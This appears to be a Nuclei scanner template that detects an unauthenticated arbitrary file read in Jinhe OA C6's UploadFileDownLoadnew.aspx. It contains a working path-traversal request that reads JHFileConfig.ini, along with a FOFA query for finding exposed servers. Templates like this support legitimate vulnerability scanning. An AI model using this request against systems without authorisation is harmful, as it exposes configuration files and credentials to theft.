35 lines
1.4 KiB
YAML
35 lines
1.4 KiB
YAML
id: jinhe-oa-c6-upload-lfi
|
|
|
|
info:
|
|
name: Jinhe OA_C6_UploadFileDownLoadnew - Arbitrary File Read
|
|
author: pussycat0x
|
|
severity: high
|
|
description: |
|
|
There is an arbitrary file reading vulnerability in the UploadFileDownLoadnew.aspx interface of Jinhe OA C6. An unauthenticated attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., causing the website to be in Extremely unsafe state.
|
|
reference:
|
|
- https://github.com/wy876/POC/blob/main/%E9%87%91%E5%92%8COA_C6_UploadFileDownLoadnew%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
fofa-query: body="JHSoft.Web.AddMenu" || app="金和网络-金和OA"
|
|
tags: jinhe-oa-c6,misconfig
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/?FilePath=../Resource/JHFileConfig.ini"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "MaxFolderTotal=1"
|
|
- "[JHFile]"
|
|
- "FolderTotal=1"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220113a253a49c9efc3ebbebb7f0f7a09f5ba9591d84421330e3237cc10aaf6f542022100ec45d703a8881402fc70b28229eab7688c3b5fa5fc9e36c43b6f97dd7ecb1faf:922c64590222798bb761d5b6d8e72950 |